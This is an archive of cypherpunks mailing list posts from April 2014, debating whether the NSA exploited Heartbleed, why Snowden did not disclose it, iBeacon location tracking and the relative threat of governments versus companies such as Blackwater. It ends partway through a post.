Date: Tue, 15 Apr 2014 17:28:26 +0200
Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug
In-Reply-To: <20140415124225.90DA72280BF@palinka.tinho.net>
References: <02A63D1F-D387-4CD7-85CB-F1299522B632@gmail.com> <20140415124225.90DA72280BF@palinka.tinho.net>
Message-ID:

2014-04-15 14:42 GMT+02:00 :
> Granted, automation (in the West)
> may beat massed manual labor (in the East), but for me and thee the
> differences in method seem not to matter in the short run.
>

They use biological machines there. Very flexible. Harder to keep in working order, but the Chinese have made great progress.

From l at odewijk.nl Tue Apr 15 08:42:41 2014
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Tue, 15 Apr 2014 17:42:41 +0200
Subject: NSA good guys
In-Reply-To: <972157717.55906.1397529975026.JavaMail.www@wwinf8315>
References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap> <972157717.55906.1397529975026.JavaMail.www@wwinf8315>
Message-ID:

> I noticed something interesting in digital 'security' circles. People who
> deal with 'security' are, at first sight, technical people and are
> concerned with issues such as factoring integers, permutations, routing
> protocols, etc. etc. etc.
>
> However, all their technical expertise exists to achieve some political
> goals. And when you look at the political beliefs of these people, you see
> that they suck big time. As engineers they may be competent, but there's a
> step above engineering, and there, they fail.
>

A statement like this is trollbait. It might not be intentional, you might even have a valid point, but presenting it like this will not help.

If you're talking about a step above pure technical you're usually talking about a software's purpose. Then that purpose can be influenced by a political belief as vague as anarchy, democracy, communism, capitalism, liberty, etc., which are words that should be used sparingly and in a way that acknowledges how terribly vague they are. I think it's not right to say their technical expertise exists to serve certain goals; many are doing it just for the hell of it. For the puzzles, the challenges.

And then we have angry Juan

> And what I'm getting at is that there are people in the 'security'
> industry who either consider politicians and the state to be a 'necessary
> evil', or worse, think that politicians and the political system they
> serve, are A Good Thing.
>

Impersonal, unclear, unmotivated. Where do you live Juan? America? Or somewhere lawless like Nigeria? There's an evolutionary system to governments, where the system rises or falls based on its fitness. Why doesn't your ideal system exist yet, and if it's stable but hard to reach, how will you create it? There's constructive ways to deal with this.

> In a nearby mailing list, there are a bunch of people who are funded by
> the american military(psycho killers) to create a so called 'anonymity
> network'. Regardless of how good they are at writing code, their political
> beliefs are sick garbage. They operate on the laughable premise that they
> are the 'good guys'
>

Calling a person psycho is very relative; they have a model of reality. IMHO it holds well enough for them not to be "psycho". They're definitely killers, but that's what the military is supposed to be. So afaics everything is okay.

The (US) government on one angle performing mass surveillance and on the other hand preventing surveillance makes perfect sense to me. They're different agencies, different people, different incentives, so the conclusions (doing/preventing mass surveillance) are the correct ones in both cases. The government working against itself is extremely common, sometimes intentional, and a symbol of what's wrong with it. Sadly it's also a symbol of what's wrong with capitalism. And anarchy (as you usually advocate) implies capitalism, although it might not be about capital. Just the struggle for ownership and control and an evolutionary process of "consumer selection" to find the optimal situation or product. Sounds idealistic? Now look upon anarchy again.

> Same people who, when called out on the source of their funding have one
> argument : "you're a tinfoil conspiracy theorist!" (Wait, of course, that's
> not an argument, just puerile name-calling)
>

I still think tinfoil hats are underrated. Van Eck phreaking of neural network interference patterns is fiction now, but the radiation is there.

More on topic, you sound like you are indeed a conspiracy theorist. You throw around little to no evidence in an emotional manner, and jump to conclusions. Do the Tor guys get US GOV funding? Yes. Does that mean they're biased? It could, but it doesn't guarantee it. Does it imply they're biased? Kinda, yeah. Does that mean you can't trust them? Well, I honestly don't know. In some cases it does. Does that mean Tor is backdoored? It probably is, and would've been without USGOV funding. If it wasn't backdoored it's almost certainly (at some level) exploited; Heartbleed is here to prove that.

Which makes me wonder, why didn't Snowden disclose Heartbleed? I'll make a thread about that.

From dan at geer.org Tue Apr 15 14:55:40 2014
From: dan at geer.org (dan at geer.org)
Date: Tue, 15 Apr 2014 17:55:40 -0400
Subject: NSA good guys
In-Reply-To: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." <534D7466.4040906@virtadpt.net>
Message-ID: <20140415215540.5D74322807F@palinka.tinho.net>

All the whining about NSA is just that, whining, by comparison to where COTS is going. The COTS folks are surpassing national labs in the reach of their traffic analysis, they just don't yet have the command structure. (They'll get one when they're deputized by the national labs of whatever country matters.)

Consider AAPL's iBeacon.

--- consumer market prepositioning drives tracking rollout ---
http://www.pfhub.com/apple-inc-s-aapl-ios-leaps-ahead-of-googles-android-in-the-new-world-of-beacons-542

> The iBeacon is spreading rapidly in a number of spheres, including
> retail, sports arenas, museums, and possibly even the home. An even
> more crucial factor, however, is how many devices running a given
> operating system are beacon-ready. iOS devices are 82% beacon ready,
> according to a report today from Patently Apple, while Android
> devices are only 2.5% beacon ready.
>
> Being successful in the world of beacon technology draws the
> business of huge retailers with deep advertising budgets, with a
> potential windfall of cash when these companies pay for access to
> both beacons and the server space that backs them up.

--- turning it off is a useful illusion ---
http://support.apple.com/kb/HT5594

> You must enable Location Services on your device and give your
> permission to each app or website
> before it can use your location data. In iOS 7, if you turn off
> Location Services and use Find My iPhone Lost Mode, Location Services
> will be re-enabled on the device as long as the device is in Lost
> Mode.
> Once Lost Mode is disabled, Location Services will return to
> its previous state.
>
> Note: For safety purposes, your iPhone's location information will
> be used for emergency calls to aid response efforts regardless of
> whether you enable Location Services.

--- everybody's ass is covered in layers of boilerplate ---
http://support.apple.com/kb/HT6048

> Note: If you allow third-party apps or websites to use your current
> location, you agree to their terms, privacy policies, and practices.
> You should review the terms, privacy policies, and practices of the
> apps and websites to understand how they use your location and other
> information. Information Apple collects will be treated in accordance
> with Apple's Privacy Policy.

--- standards, schmandards ---
http://www.mobilemarketinguniverse.com/bluetooth-beacons-vs-wifi-vs-nfc-2

> After Apple chose BLE as standard rather than NFC/RFID, we believe
> that the two winning technologies in North America will be Wifi
> and BLE whereas NFC still has a good chance in the rest of the
> world.

--dan

From l at odewijk.nl Tue Apr 15 09:16:15 2014
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Tue, 15 Apr 2014 18:16:15 +0200
Subject: Why didn't Snowden disclose Heartbleed (and others)?
Message-ID:

Exhaustive list of possibilities (please extend where possible):
A Did not know
B Did not care
C Felt like it would negatively impact the NSA's (legitimate) functioning
D Didn't get around to it yet
E Snowden is an unconventional NSA set up
F Snowden's documents are not recent enough

A, is interesting, as it would show that the NSA has levels of secrecy and secret data that go further than what they had so far. Something above "TOP SECRET" should probably exist, and Snowden didn't find it. This actually makes a lot of sense to me, so it might well be it.

B, he might think it's not very interesting. Using 0-days should be old-hat and expected. Disclosing specific exploits would not stop the bleeding, the NSA would just find new ones. He might even consider 0-day hoarding acceptable business, just not the mass employment of them.

C, he's often maintained a sort of "I'm coming out to the public with this, but I'm very sorry to hurt the US in a way"-kind of attitude. It would definitely cripple the NSA if he released novel and important bugs. Think of how hard it would be to hack-back at China!

D, There's some scheduling going on to maximize impact. He might release the "0-day-exploit list that endangers life as we know it, and the NSA did nothing" later, when attention dies down again.

E, Maybe the NSA have become a common thing in popular culture and they dislike their image of being a completely opaque organization with potentially unlimited power. So now they are sharing information about the "outer shell" of the organization, a sort of facade. Meanwhile it seems like the world is crushing down upon them.

In a few years their image will be renewed. Everyone will think "The NSA was not that unlimited in its capabilities and worked very hard. Now that they have rules and limits it will all be okay". And with that a whole new level of FUD will have been achieved. Making people believe they are the evil you know.

Of course, this is religious level conspiracies. And of course, that's exactly the level the NSA would start to accept. They're the information and espionage experts. If anyone could pull this off, it'd be them.

(Didn't the CIA/NSA own the media? Don't they still? This might be easier than you'd expect)

F, I couldn't find exactly to which date his documents go. Heartbleed was merged December 31 2011 (lonely night? sneaky vacation timing?). Assuming the NSA checks patches (ofc they do) they should've found it in Jan 2012. Snowden. Ah. Found it. "Greenwald began working with Snowden in either February[113] or in April after Poitras asked Greenwald to meet her in New York City, at which point Snowden began providing documents to them both" That'd be April 2013.

He still might've stolen the documents earlier, but who knows?

From guninski at guninski.com Tue Apr 15 09:47:54 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Tue, 15 Apr 2014 19:47:54 +0300
Subject: Why didn't Snowden disclose Heartbleed (and others)?
In-Reply-To:
References:
Message-ID: <20140415164754.GB2526@sivokote.iziade.m$>

On Tue, Apr 15, 2014 at 06:16:15PM +0200, Lodewijk andré de la porte wrote:
> Exhaustive list of possibilities (please extend where possible):
> A Did not know
> B Did not care
> C Felt like it would negatively impact the NSA's (legitimate) functioning
> D Didn't get around to it yet
> E Snowden is an unconventional NSA set up
> F Snowden's documents are not recent enough
>
> A, is interesting, as it would show that the NSA has levels of secrecy and
> secret data that go further than what they had so far. Something above "TOP
> SECRET" should probably exist, and Snowden didn't find it. This actually
> makes a lot of sense to me, so it might well be it.
>

The short answer to the question in the subject is that HB is not worth using if you can execute remote code on openssl (call me a troll just because you disagree).

As for above TOP secret: I don't believe snowden's documents about Tor reflect the current evilness of NSA -- just don't trust what the NSA/snowden allegedly disclose about Tor. Some targets got in jail for naively using Tor (check thereg). Reference for the Tor documents is the ACLU mirror of snowden.

Probably this drama is explained by the saying: "A society of sheep deserves a government of wolves".

> B, he might think it's not very interesting. Using 0-days should be old-hat
> and expected. Disclosing specific exploits would not stop the bleeding, the
> NSA would just find new ones. He might even consider 0-day hoarding
> acceptable business, just not the mass employment of them.
>
> C, he's often maintained a sort of "I'm coming out to the public with this,
> but I'm very sorry to hurt the US in a way"- kind of attitude. It would
> definitely cripple the NSA if he released novel and important bugs. Think
> of how hard it would be to hack-back at China!
>
> D, There's some scheduling going on to maximize impact. He might release
> the "0-day-exploit list that endangers life as we know it, and the NSA did
> nothing" later, when attention dies down again.
>
> E, Maybe the NSA have become a common thing in popular culture and they
> dislike their image of being a completely opaque organization with
> potentially unlimited power. So now they are sharing information about the
> "outer shell" of the organization, a sort of facade. Meanwhile it seems
> like the world is crushing down upon them.
>
> In a few years their image will be renewed. Everyone will think "The NSA
> was not that unlimited in its capabilities and worked very hard. Now that
> they have rules and limits it will all be okay". And with that a whole new
> level of FUD will have been achieved. Making people believe they are the
> evil you know.
>
> Of course, this is religious level conspiracies. And of course, that's
> exactly the level the NSA would start to accept. They're the information
> and espionage experts. If anyone could pull this off, it'd be them.
>
> (Didn't the CIA/NSA own the media? Don't they still? This might be easier
> than you'd expect)
>
> F, I couldn't find exactly to which date his documents go. Heartbleed was
> merged December 31 2011 (lonely night? sneaky vacation timing?). Assuming
> the NSA checks patches (ofc they do) they should've found it in Jan 2012.
> Snowden. Ah. Found it. "Greenwald began working with Snowden in either
> February[113] or in April after Poitras asked Greenwald to meet her in New
> York City, at which point Snowden began providing documents to them both"
> That'd be April 2013.
>
> He still might've stolen the documents earlier, but who knows?

From tpb-crypto at laposte.net Tue Apr 15 12:04:56 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Tue, 15 Apr 2014 21:04:56 +0200
Subject: NSA good guys
In-Reply-To: <534D7466.4040906@virtadpt.net>
References: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> <2025530288.47217.1397506109407.JavaMail.www@wwinf8305> <1603449.SJ9FqTUdKW@lap> <972157717.55906.1397529975026.JavaMail.www@wwinf8315> <534D7466.4040906@virtadpt.net>
Message-ID: <1493357443.123660.1397588696119.JavaMail.www@wwinf8310>

> Message of 15/04/14 20:34
> From: "The Doctor"
>
> > One could argue that laws which punish hacking as a higher offense
> > than rape is a byproduct of stupid politicians scared by technology
> > which they don't have
> > any understanding of.
>
> Perhaps it is due to their thinking that technology poses a serious
> threat to their power bases.
>

Well, that fear was shared by religious authorities of all stripes a few centuries ago, regarding science. And religious authorities were right about their fears; their power is gone. Considering that politicians are not so stupid, the fight will be harder this time.

From l at odewijk.nl Tue Apr 15 14:53:42 2014
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Tue, 15 Apr 2014 23:53:42 +0200
Subject: Why didn't Snowden disclose Heartbleed (and others)?
In-Reply-To: <534D8446.7010508@cpunk.us>
References: <534D8446.7010508@cpunk.us>
Message-ID:

2014-04-15 21:11 GMT+02:00 Cypher :
> This is why I've long been an advocate of total disclosure. I think
> the document holders should publish everything they have.
After they > do that, they could continue to 'leak release' documents with detailed > explanations for those who are too lazy or too confused by the > documents to sift through them and read them but having a document > dump out there would make the process of disclosure /much/ faster. > The problem is that the general public is very slow to learn. Every step along the way even the wise said things like "OH! The NSA said A, but they'll *never* say B!". Then two weeks later the docs show that B has not just been said, it'd been SCREAMED. Then the word is "But they'll never say C!". Etc. Maybe at some point people will pick it up differently. It also fits the media format better to drip info. A new news article every new drip. That makes for a lot more exposure. It's sad but true. I would *LOVE* instant full disclosure. But it just wouldn't have the same effect. Maybe you could do selective full disclosure, but who'd be allowed access? And who'd prevent the store of data from being leaked again? Additionally there's the rewriting and securing. Often documents have person-specific typo's or sentence changes that can identify a specific instance of a document. There was this company that wanted to use it on e-books, rewriting "good" to "not bad", etc. Anyway, mixed bag regarding full disclosure. I think this is easier, safer and reaches the general public better and as such it's the right choice. It's a damn shame that it is, sensationalism isn't fun. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2413 bytes Desc: not available URL: From gfoster at entersection.org Tue Apr 15 23:42:55 2014 From: gfoster at entersection.org (Gregory Foster) Date: Wed, 16 Apr 2014 01:42:55 -0500 Subject: NSA good guys In-Reply-To: <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> References: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." 
<534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> Message-ID: <534E266F.9000507@entersection.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > Companies cannot seize your property, put you in jail and queue you > to the death row. http://en.wikipedia.org/wiki/Academi > The company received widespread publicity in 2007 when a group of > its employees shot at Iraqi civilians killing 17 and injuring 20 in > Nisour Square, Baghdad. ... Blackwater was also hired during the > aftermath of Hurricane Katrina by the United States Department of > Homeland Security, as well as by private clients, including > communications, petrochemical and insurance companies. gf - -- Gregory Foster || gfoster at entersection.org @gregoryfoster <> http://entersection.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.19 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBCgAGBQJTTiZrAAoJEMaAACmjGtgjAX8P/3ISkcXYU6iE79v10sXonlf0 sGDiW2y4Fi7sgQC4m4z1J+8bSS/X1l63ms3u4e8OjB5tE3/SgNp6hTFuOVzwmVdl pIHloSm7pWVb4bU48w06IVr4EctkzWJn2WfA+AvPBCx5eDp6RKrgC9TBDGz3bNF+ ZYz9PxekEo6O7oxD6V2ywZ7egx65BoUN6VHuJjIm4bDca/T8vNSLWmw+cMqAy/Wl +kr3BAHF/FpGclef339RwRmJj+nChu45uiOoBpdQSTBtg79J9/iQOyjk4PYvdVjw AytHFp3zEXKf7GVUZfc0+pPMbFxrlOQoStCARbHOYK9oXmtDcNeauoRIAWbY7NYN bTSACIfrTaTjCA41Sfoj2ABsqRRO0GcbxWghKOME0F2lUWcyWkQmxxUclTHgtwCq +oGoeGwSXyTEAa9mWb2FyDRJn6boNZiKq3tTeoYQm+Wp9yvy0baGl2hfn3rl5C/T 2p+9G2g5bK4mRgorewVqp0YqJXZuTgbL4O2Zc/hATPBwQ23qSsJ8EX3mMkM8UhJH NU2BQX/ddlg5hivTyBrmLDbiQtZ5qNZmDTXjTHKF2vVJubacxW+RJ+jG8OtE2X3s jCeoUdOAZEhp8RNtiQ6ESaaVlh7Hewmz6RZEDrjHwBAzZeDb0eWblEzqLrQio3Aw VPfzWPfkCOR+z0Wf2hkN =wTjj -----END PGP SIGNATURE----- From coderman at gmail.com Wed Apr 16 04:55:27 2014 From: coderman at gmail.com (coderman) Date: Wed, 16 Apr 2014 04:55:27 -0700 Subject: NSA good guys In-Reply-To: 
<2103388535.132700.1397623226382.JavaMail.www@wwinf8228> References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> Message-ID: On Tue, Apr 15, 2014 at 9:40 PM, wrote: >... > Companies cannot seize your property, put you in jail and queue you to the death row. it takes a "strategic partner" to do that ;) we should be deeply concerned about both government and private industry privacy invasion, as they're both faces of unrestrained incentives working against our interests; both especially effective at eroding our privacy toward different ends via shared means. "The Intercept" has still not published leaks relevant to PayPal's involvement in PRISM(like) collection... From tpb-crypto at laposte.net Tue Apr 15 21:40:44 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Wed, 16 Apr 2014 06:40:44 +0200 Subject: NSA good guys In-Reply-To: <20140415215540.5D74322807F@palinka.tinho.net> References: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> Message-ID: <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> > Message du 16/04/14 01:25 > De : dan at geer.org > A : cypherpunks at cpunks.org > Copie à : > Objet : Re: NSA good guys > > > All the whining about NSA is just that, whining, by comparison to > where COTS is going. The COTS folks are surpassing national labs > in the reach of their traffic analysis, they just don't yet have > the command structure. (They'll get one when they're deputized by > the national labs of whatever country matters.) > > Consider AAPL's iBeacon. > > --- consumer market prepositioning drives tracking rollout --- > http://www.pfhub.com/apple-inc-s-aapl-ios-leaps-ahead-of-googles-android-in-the > -new-world-of-beacons-542 > > The iBeacon is spreading rapidly in a number of spheres, including > > retail, sports arenas, museums, and possibly even the home. 
An even > > more crucial factor, however, is how many devices running a given > > operating system are beacon-ready. iOS devices are 82% beacon ready, > > according to a report today from Patently Apple, while Android > > devices are only 2.5% beacon ready. > > > > Being successful in the world of beacon technology draws the > > business of huge retailers with deep advertising budgets, with a > > potential windfall of cash when these companies pay for access to > > both beacons and the server space that backs them up. > > --- turning it off is a useful illusion --- > http://support.apple.com/kb/HT5594 > > You must enable Location Services on your device and give your > > http://support.apple.com/kb/HT5594 permission to each app or website > > before it can use your location data. In iOS 7, if you turn off > > Location Services and use Find My iPhone Lost Mode, Location Services > > will be re-enabled on the device as long as the device is in Lost > > Mode. Once Lost Mode is disabled, Location Services will return to > > its previous state. > > > > Note: For safety purposes, your iPhones location information will > > be used for emergency calls to aid response efforts regardless of > > whether you enable Location Services. > > --- everybody's ass is covered in layers of boilerplate --- > http://support.apple.com/kb/HT6048 > > Note: If you allow third-party apps or websites to use your current > > location, you agree to their terms, privacy policies, and practices. > > You should review the terms, privacy policies, and practices of the > > apps and websites to understand how they use your location and other > > information. Information Apple collects will be treated in accordance > > with Apple's Privacy Policy. 
> > --- standards, schmandards --- > http://www.mobilemarketinguniverse.com/bluetooth-beacons-vs-wifi-vs-nfc-2 > > After Apple chose BLE as standard rather than NFC/RFID, we believe > > that the two winning technologies in North America will be Wifi > > and BLE whereas NFC still has a good chance in the rest of the > > world. > > > --dan > > Companies cannot seize your property, put you in jail and queue you to the death row. From juan.g71 at gmail.com Wed Apr 16 02:57:17 2014 From: juan.g71 at gmail.com (Juan) Date: Wed, 16 Apr 2014 06:57:17 -0300 Subject: NSA good guys In-Reply-To: <534E266F.9000507@entersection.org> References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> Message-ID: <534e5405.c5bd3a0a.3f3d.424a@mx.google.com> On Wed, 16 Apr 2014 01:42:55 -0500 Gregory Foster wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > Companies cannot seize your property, put you in jail and queue you > > to the death row. > > http://en.wikipedia.org/wiki/Academi > > > The company received widespread publicity in 2007 when a group of > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > aftermath of Hurricane Katrina by the United States Department of > > Homeland Security, as well as by private clients, including > > communications, petrochemical and insurance companies. 
> > gf Well, 1) blackwater is a creation of 'ex' murderers from the american military 2) blackwater operates with a 'licence'(to kill) from the american government > > - -- > Gregory Foster || gfoster at entersection.org > @gregoryfoster <> http://entersection.com/ From europus at gmail.com Wed Apr 16 04:10:50 2014 From: europus at gmail.com (Ulex Europae) Date: Wed, 16 Apr 2014 07:10:50 -0400 Subject: NSA good guys In-Reply-To: <534E266F.9000507@entersection.org> References: <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> Message-ID: <534e6539.63d8440a.17ce.013a@mx.google.com> At 02:42 AM 4/16/2014, Gregory Foster wrote: >On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > Companies cannot seize your property, put you in jail and queue you > > to the death row. > >http://en.wikipedia.org/wiki/Academi > > > The company received widespread publicity in 2007 when a group of > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > Nisour Square, Baghdad. 
... Blackwater was also hired during the > > aftermath of Hurricane Katrina by the United States Department of > > Homeland Security, as well as by private clients, including > > communications, petrochemical and insurance companies. Do you have any evidence that any of those victims were targeted for any reason other than being in the wrong place at the wrong time? You seem to be conflating war with companies exercising a variant of eminent domain. From jya at pipeline.com Wed Apr 16 06:36:52 2014 From: jya at pipeline.com (John Young) Date: Wed, 16 Apr 2014 09:36:52 -0400 Subject: NSA good guys In-Reply-To: <534e6539.63d8440a.17ce.013a@mx.google.com> References: <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <534e6539.63d8440a.17ce.013a@mx.google.com> Message-ID: "Wrong place at the wrong time." This is the platinum defense Blackwater and the USG used to excuse the murders. And the same used for any warfare collateral damage, strategic bombing of civilians, WMD mutually assured destruction, law enforcement killings, CIA killings, Mafia killings, drug kingpin killings, husbands and wives killing of each other and their kids, abortion killings, gun-lovers killings, slaughter of indigenous peoples, military slaughter of all kinds -- why the very lament of every killer who is caught red-handed, blood dripping with body-armored thrill. Indeed, this exculpation is taught in the drone operation schools, top military academies, in special operations and covert operations schools, in basic training to teach newbie killers to use force against defenseless targets, in foreign policy universities and think wankerages, in richest clubs of murderers gulping tankards of blood-red wine toasting asymmetrical carnage of worldwide finance, law and religion. Business schools most bloody-minded, eminent domain and taxpayer subsidy for predation Course 101. 
Millions of people have been, are, and will be, slaughtered by this very rationale of repugnant cowards who are sexually gratified by obliterating helpless creatures who happened to be in the wrong place at the wrong time. Even a small percentage of the killers suffer this fate, but they are honored with grotesque displays of bloodless sparkling uniforms, weeping families, snoring encomiums of sacrifice, luxurious caskets flag-draped, tooting of bugles and firing of rifles (!), then dumped in the same ground as their hapless victims to rot and be eaten by worms enjoying being in the right place at the right time. At 07:10 AM 4/16/2014, you wrote: >Do you have any evidence that any of those victims were targeted for >any reason other than being in the wrong place at the wrong time? >You seem to be conflating war with companies exercising a variant >of eminent domain. > > From tpb-crypto at laposte.net Wed Apr 16 03:16:21 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Wed, 16 Apr 2014 12:16:21 +0200 Subject: NSA good guys In-Reply-To: <534E266F.9000507@entersection.org> References: Your message of "Tue, 15 Apr 2014 11:03:18 PDT." <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> Message-ID: <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> > Message du 16/04/14 10:16 > De : "Gregory Foster" > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > Companies cannot seize your property, put you in jail and queue you > > to the death row. > > http://en.wikipedia.org/wiki/Academi > > > The company received widespread publicity in 2007 when a group of > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > Nisour Square, Baghdad. ... 
Blackwater was also hired during the > > aftermath of Hurricane Katrina by the United States Department of > > Homeland Security, as well as by private clients, including > > communications, petrochemical and insurance companies. > Ok, the exception that confirms the rule, that was a company hired by the government to do its dirty job, ie, mercenaries. Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such services or do it themselves, they continue to be a lesser threat to the people than government is. Legally, none of them can do what you quoted above. From tedks at riseup.net Wed Apr 16 09:19:44 2014 From: tedks at riseup.net (Ted Smith) Date: Wed, 16 Apr 2014 12:19:44 -0400 Subject: Why didn't Snowden disclose Heartbleed (and others)? In-Reply-To: References: Message-ID: <1397665184.25313.1.camel@anglachel> On Tue, 2014-04-15 at 18:16 +0200, Lodewijk andré de la porte wrote: > F, I couldn't find exactly to which date his documents go. Heartbleed > was merged December 31 2011 (lonely night? sneaky vacation timing?). > Assuming the NSA checks patches (ofc they do) they should've found it > in Jan 2012. Snowden. Ah. Found it. "Greenwald began working with > Snowden in either February[113] or in April after Poitras asked > Greenwald to meet her in New York City, at which point Snowden began > providing documents to them both" That'd be April 2013. > > > He still might've stolen the documents earlier, but who knows? I think the documents are significantly earlier than that. I think it's probably a mix of A and F; more sensitive information is probably more watched even if it's still just TOP SECRET. Also, there are definitely classifications above and within TOP SECRET. Look at the annotations on the Snowden documents. -- Sent from Ubuntu -------------- next part -------------- A non-text attachment was scrubbed... 
Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part URL: From l at odewijk.nl Wed Apr 16 06:01:02 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Wed, 16 Apr 2014 15:01:02 +0200 Subject: NSA good guys In-Reply-To: <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: 2014-04-16 12:16 GMT+02:00 : > > Message du 16/04/14 10:16 > > De : "Gregory Foster" > > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: > > > Companies cannot seize your property, put you in jail and queue you > > > to the death row. > > > > http://en.wikipedia.org/wiki/Academi > > > > > The company received widespread publicity in 2007 when a group of > > > its employees shot at Iraqi civilians killing 17 and injuring 20 in > > > Nisour Square, Baghdad. ... Blackwater was also hired during the > > > aftermath of Hurricane Katrina by the United States Department of > > > Homeland Security, as well as by private clients, including > > > communications, petrochemical and insurance companies. > > > > Ok, the exception that confirms the rule, that was a company hired by the > government to do its dirty job, ie, mercenaries. > > Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such > services or do it themselves, they continue to be a lesser threat to the > people than government is. Legally, none of them can do what you quoted > above. And neither can persons! Government having a violence monopoly is EXACTLY the idea! And one I wholeheartedly wish would be 100% effective and fair! Actually if the government would just TAKE all the violence and write it to /dev/null that'd be PERFECT for me. 
Then we can start struggling with less demons such as abuse of power and wealth. Doesn't it just disgust you to think that anyone could be used sexually in whatever means, provided sufficient money compensates someone for it? What kind of violence is it that someone can provide something so compelling that he/she would do anything to get it? Think of how that used person convinces him/herself to do something completely unnatural, so disgusting it makes one retch, sheerly for an imaginary compensation. I wonder how well that situation is actually the situation for many prostitutes in present day. Is this even related? Oh yes, the NSA. Well. Seems this has become a thread about unnatural and utterly disgusting things. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2913 bytes Desc: not available URL: From beam at rayservers.net Wed Apr 16 07:37:09 2014 From: beam at rayservers.net (beam) Date: Wed, 16 Apr 2014 16:37:09 +0200 Subject: [FC] - NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> Message-ID: <534E9595.5030501@rayservers.net> On 16/04/2014 13:55, coderman wrote: > (...) > "The Intercept" has still not published leaks relevant to PayPal's > involvement in PRISM(like) collection... > IMHO there is no point to blame one entity or one electronic payment system for online transactions when the international bank/finance regulations (acts, bills, laws, legislations) encourage/force data collection/merging/profiling/sharing everywhere all the time. But you point in the right direction to an old topic on the cpunk list. To begin, at the beginning: *financial privacy issues* The good news is the emergence of new fintech based on new financial cryptography systems which will ensure financial privacy. 
-------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 261 bytes Desc: OpenPGP digital signature URL: From juan.g71 at gmail.com Wed Apr 16 12:59:11 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Wed, 16 Apr 2014 16:59:11 -0300 Subject: NSA good guys In-Reply-To: References: <534D7466.4040906@virtadpt.net> <20140415215540.5D74322807F@palinka.tinho.net> <2103388535.132700.1397623226382.JavaMail.www@wwinf8228> <534E266F.9000507@entersection.org> <1111057254.150933.1397643381699.JavaMail.www@wwinf8308> Message-ID: <42E4D2B62737BDBD1E95AEA8@F74D39FA044AA309EAEA14B9> --On Wednesday, April 16, 2014 3:01 PM +0200 Lodewijk andré de la porte wrote: > 2014-04-16 12:16 GMT+02:00 : > >> > Message du 16/04/14 10:16 >> > De : "Gregory Foster" >> > On 4/15/14, 11:40 PM, tpb-crypto at laposte.net wrote: >> > > Companies cannot seize your property, put you in jail and queue you >> > > to the death row. >> > >> > http://en.wikipedia.org/wiki/Academi >> > >> > > The company received widespread publicity in 2007 when a group of >> > > its employees shot at Iraqi civilians killing 17 and injuring 20 in >> > > Nisour Square, Baghdad. ... Blackwater was also hired during the >> > > aftermath of Hurricane Katrina by the United States Department of >> > > Homeland Security, as well as by private clients, including >> > > communications, petrochemical and insurance companies. >> > >> >> Ok, the exception that confirms the rule, that was a company hired by the >> government to do its dirty job, ie, mercenaries. >> >> Until google, facebook, comcast, DHL, GM, Boeing, ... don't hire such >> services or do it themselves, they continue to be a lesser 